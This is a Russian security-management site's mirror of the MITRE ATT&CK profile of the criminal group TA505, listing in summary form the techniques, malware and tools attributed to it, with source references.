Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Поиск
Вход Регистрация
MITRE ATT&CK - Преступная группа TA505
Риски
Каталоги
MITRE ATT&CK
Преступная группа
TA505
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

TA505

TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)
ID: G0092
Associated Groups: Hive0065, CHIMBORAZO, Spandex Tempest
Version: 3.0
Created: 28 May 2019
Last Modified: 10 Apr 2024

Associated Group Descriptions
Name Description
Hive0065 (Citation: IBM TA505 April 2020)
CHIMBORAZO (Citation: Microsoft Threat Actor Naming July 2023)
Spandex Tempest (Citation: Microsoft Threat Actor Naming July 2023)

Techniques Used
Domain ID Name Use
Enterprise T1087 .003 Account Discovery: Email Account

TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.(Citation: Trend Micro TA505 June 2019)
Enterprise T1583 .001 Acquire Infrastructure: Domains

TA505 has registered domains to impersonate services such as Dropbox to distribute malware.(Citation: Korean FSI TA505 2020)
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

TA505 has used HTTP to communicate with C2 nodes.(Citation: IBM TA505 April 2020)
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

TA505 has used PowerShell to download and execute malware and reconnaissance scripts.(Citation: Proofpoint TA505 Sep 2017)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)
.003 Command and Scripting Interpreter: Windows Command Shell

TA505 has executed commands using cmd.exe.(Citation: Trend Micro TA505 June 2019)

.005 Command and Scripting Interpreter: Visual Basic

TA505 has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Trend Micro TA505 June 2019)(Citation: IBM TA505 April 2020)

.007 Command and Scripting Interpreter: JavaScript

TA505 has used JavaScript for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

TA505 has used malware to gather credentials from Internet Explorer.(Citation: Proofpoint TA505 Sep 2017)
Enterprise T1568 .001 Dynamic Resolution: Fast Flux DNS

TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.(Citation: Trend Micro TA505 June 2019)
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

TA505 has used malware to disable Windows Defender.(Citation: Korean FSI TA505 2020)
Enterprise T1559 .002 Inter-Process Communication: Dynamic Data Exchange

TA505 has leveraged malicious Word documents that abused DDE.(Citation: Proofpoint TA505 June 2018)
Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

TA505 has used UPX to obscure malicious code.(Citation: IBM TA505 April 2020)
.010 Obfuscated Files or Information: Command Obfuscation

TA505 has used base64 encoded PowerShell commands.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)

.013 Obfuscated Files or Information: Encrypted/Encoded File

TA505 has password-protected malicious Word documents.(Citation: Proofpoint TA505 Sep 2017)

Enterprise T1588 .001 Obtain Capabilities: Malware

TA505 has used malware such as Azorult and Cobalt Strike in their operations.(Citation: NCC Group TA505)
.002 Obtain Capabilities: Tool

TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.(Citation: NCC Group TA505)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

TA505 has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)
.002 Phishing: Spearphishing Link

TA505 has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

TA505 has been seen injecting a DLL into winword.exe.(Citation: IBM TA505 April 2020)
Enterprise T1608 .001 Stage Capabilities: Upload Malware

TA505 has staged malware on actor-controlled domains.(Citation: Korean FSI TA505 2020)
Enterprise T1553 .002 Subvert Trust Controls: Code Signing

TA505 has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)
.005 Subvert Trust Controls: Mark-of-the-Web Bypass

TA505 has used .iso files to deploy malicious .lnk files.(Citation: TrendMicro TA505 Aug 2019)

Enterprise T1218 .007 System Binary Proxy Execution: Msiexec

TA505 has used msiexec to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)
.011 System Binary Proxy Execution: Rundll32

TA505 has leveraged rundll32.exe to execute malicious DLLs.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)

Enterprise T1552 .001 Unsecured Credentials: Credentials In Files

TA505 has used malware to gather credentials from FTP clients and Outlook.(Citation: Proofpoint TA505 Sep 2017)
Enterprise T1204 .001 User Execution: Malicious Link

TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)
.002 User Execution: Malicious File

TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)

Enterprise T1078 .002 Valid Accounts: Domain Accounts

TA505 has used stolen domain admin accounts to compromise additional hosts.(Citation: IBM TA505 April 2020)

Software
ID Name References Techniques
S0266 TrickBot (Citation: CrowdStrike Wizard Spider October 2020) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TA505 April 2020) (Citation: IBM TrickBot Nov 2016) (Citation: Microsoft Totbrick Oct 2017) (Citation: Proofpoint TA505 Sep 2017) (Citation: S2 Grupo TrickBot June 2017) (Citation: TSPY_TRICKLOAD) (Citation: Totbrick) (Citation: Trend Micro Totbrick Oct 2016) (Citation: TrendMicro Trickbot Feb 2019) Scheduled Task, VNC, System Owner/User Discovery, Standard Encoding, Encrypted/Encoded File, Permission Groups Discovery, Bootkit, Malicious File, Symmetric Cryptography, Local Account, Windows Service, Spearphishing Link, Spearphishing Attachment, Component Object Model, Password Managers, System Service Discovery, Code Signing, Credentials in Registry, Network Share Discovery, System Information Discovery, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Remote Access Tools, Masquerading, Process Injection, Email Account, Time Based Evasion, Browser Session Hijacking, Modify Registry, Credentials from Web Browsers, External Proxy, System Network Configuration Discovery, Domain Trust Discovery, File and Directory Discovery, Credentials In Files, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Exploitation of Remote Services, Registry Run Keys / Startup Folder, Disable or Modify Tools, Non-Standard Port, Process Hollowing, Credential Stuffing, Obfuscated Files or Information, Uncommonly Used Port, Hidden Window, Windows Command Shell, Software Packing, Web Protocols, Remote System Discovery, Ingress Tool Transfer, Fallback Channels, Credential API Hooking, Firmware Corruption, Commonly Used Port
S0039 Net (Citation: Microsoft Net Utility) (Citation: Savill 1999) (Citation: Trend Micro TA505 June 2019) Domain Account, Local Account, Domain Groups, System Service Discovery, Network Share Discovery, Additional Local or Domain Groups, SMB/Windows Admin Shares, Local Account, Domain Account, System Network Connections Discovery, Local Groups, Network Share Connection Removal, Password Policy Discovery, Remote System Discovery, Service Execution, System Time Discovery
S1025 Amadey (Citation: BlackBerry Amadey 2020) (Citation: Korean FSI TA505 2020) System Owner/User Discovery, Fast Flux DNS, System Information Discovery, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Modify Registry, System Network Configuration Discovery, File and Directory Discovery, Mark-of-the-Web Bypass, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Obfuscated Files or Information, System Location Discovery, Security Software Discovery, Web Protocols, Ingress Tool Transfer
S0521 BloodHound (Citation: CrowdStrike BloodHound April 2018) (Citation: FoxIT Wocao December 2019) (Citation: GitHub Bloodhound) (Citation: NCC Group TA505) System Owner/User Discovery, Group Policy Discovery, Domain Account, Local Account, Domain Groups, Native API, Archive Collected Data, Domain Trust Discovery, PowerShell, Local Groups, Password Policy Discovery, Remote System Discovery
S0460 Get2 (Citation: Proofpoint TA505 October 2019) System Owner/User Discovery, System Information Discovery, Command and Scripting Interpreter, Process Discovery, Web Protocols, Dynamic-link Library Injection
S0194 PowerSploit (Citation: GitHub PowerSploit May 2012) (Citation: NCC Group TA505) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) Scheduled Task, Windows Management Instrumentation, Screen Capture, Keylogging, Path Interception by PATH Environment Variable, Audio Capture, Local Account, Windows Service, DLL, Credentials in Registry, Data from Local System, Reflective Code Loading, Security Support Provider, Path Interception by Search Order Hijacking, LSASS Memory, Domain Trust Discovery, Group Policy Preferences, Process Discovery, PowerShell, Registry Run Keys / Startup Folder, Indicator Removal from Tools, Path Interception by Unquoted Path, Query Registry, Path Interception, Windows Credential Manager, Command Obfuscation, Access Token Manipulation, Kerberoasting, Dynamic-link Library Injection
S0383 FlawedGrace (Citation: Proofpoint TA505 Jan 2019) (Citation: Proofpoint TA505 October 2019) (Citation: Trend Micro TA505 June 2019) Encrypted/Encoded File, Custom Command and Control Protocol, Commonly Used Port
S0381 FlawedAmmyy (Citation: Proofpoint TA505 Mar 2018) (Citation: Proofpoint TA505 October 2019) (Citation: Trend Micro TA505 June 2019) Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Rundll32, Keylogging, Symmetric Cryptography, Clipboard Data, Peripheral Device Discovery, System Information Discovery, Msiexec, Data from Local System, Exfiltration Over C2 Channel, PowerShell, Registry Run Keys / Startup Folder, Local Groups, Data Obfuscation, Input Capture, Security Software Discovery, Windows Command Shell, File Deletion, Web Protocols, Ingress Tool Transfer, Commonly Used Port
S0461 SDBbot (Citation: IBM TA505 April 2020) (Citation: Proofpoint TA505 October 2019) System Owner/User Discovery, Rundll32, System Information Discovery, Data from Local System, Deobfuscate/Decode Files or Information, Application Shimming, Image File Execution Options Injection, Video Capture, System Network Configuration Discovery, Proxy, Indicator Removal, File and Directory Discovery, Process Discovery, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Non-Application Layer Protocol, System Location Discovery, Windows Command Shell, File Deletion, Software Packing, Ingress Tool Transfer, Remote Desktop Protocol, Dynamic-link Library Injection
S0154 Cobalt Strike (Citation: NCC Group TA505) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0382 ServHelper (Citation: Cybereason TA505 April 2019) (Citation: Deep Instinct TA505 Apr 2019) (Citation: Proofpoint TA505 Jan 2019) (Citation: Trend Micro TA505 June 2019) Scheduled Task, System Owner/User Discovery, Rundll32, System Information Discovery, Additional Local or Domain Groups, Local Account, PowerShell, Registry Run Keys / Startup Folder, Asymmetric Cryptography, Windows Command Shell, Masquerade Account Name, File Deletion, Web Protocols, Ingress Tool Transfer, Remote Desktop Protocol, Commonly Used Port
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: NCC Group TA505) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0611 Clop (Citation: Cybereason Clop Dec 2020) (Citation: Mcafee Clop Aug 2019) (Citation: Unit42 Clop April 2021) Service Stop, Code Signing, Network Share Discovery, Msiexec, Native API, Deobfuscate/Decode Files or Information, Time Based Evasion, Modify Registry, File and Directory Discovery, Process Discovery, Disable or Modify Tools, Data Encrypted for Impact, System Language Discovery, Security Software Discovery, Windows Command Shell, Software Packing, Inhibit System Recovery
S0384 Dridex (Citation: Bugat v5) (Citation: Checkpoint Dridex Jan 2021) (Citation: Dell Dridex Oct 2015) (Citation: IBM TA505 April 2020) (Citation: Kaspersky Dridex May 2017) (Citation: Proofpoint TA505 June 2018) (Citation: Proofpoint TA505 Sep 2017) (Citation: Treasury EvilCorp Dec 2019) Scheduled Task, Malicious File, Symmetric Cryptography, DLL, System Information Discovery, Native API, Remote Access Tools, Browser Session Hijacking, Proxy, Multi-hop Proxy, Obfuscated Files or Information, Regsvr32, Asymmetric Cryptography, Web Protocols, Software Discovery
S0552 AdFind (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) (Citation: NCC Group TA505) (Citation: Red Canary Hospital Thwarted Ryuk October 2020) Domain Account, Domain Groups, System Network Configuration Discovery, Domain Trust Discovery, Remote System Discovery
S0344 Azorult (Citation: NCC Group TA505) (Citation: Proofpoint Azorult July 2018) (Citation: Unit42 Azorult Nov 2018) Screen Capture, System Owner/User Discovery, Symmetric Cryptography, System Information Discovery, Deobfuscate/Decode Files or Information, Credentials from Web Browsers, Create Process with Token, System Network Configuration Discovery, File and Directory Discovery, Credentials In Files, Process Discovery, Process Hollowing, Query Registry, File Deletion, Ingress Tool Transfer, System Time Discovery

References

  1. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved September 16, 2024..
  2. Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
  3. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
  4. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
  5. Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.
  6. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  7. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.
  8. Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021.
  9. Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.
  10. Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.
  11. Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.
  12. Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.
  13. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
  14. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.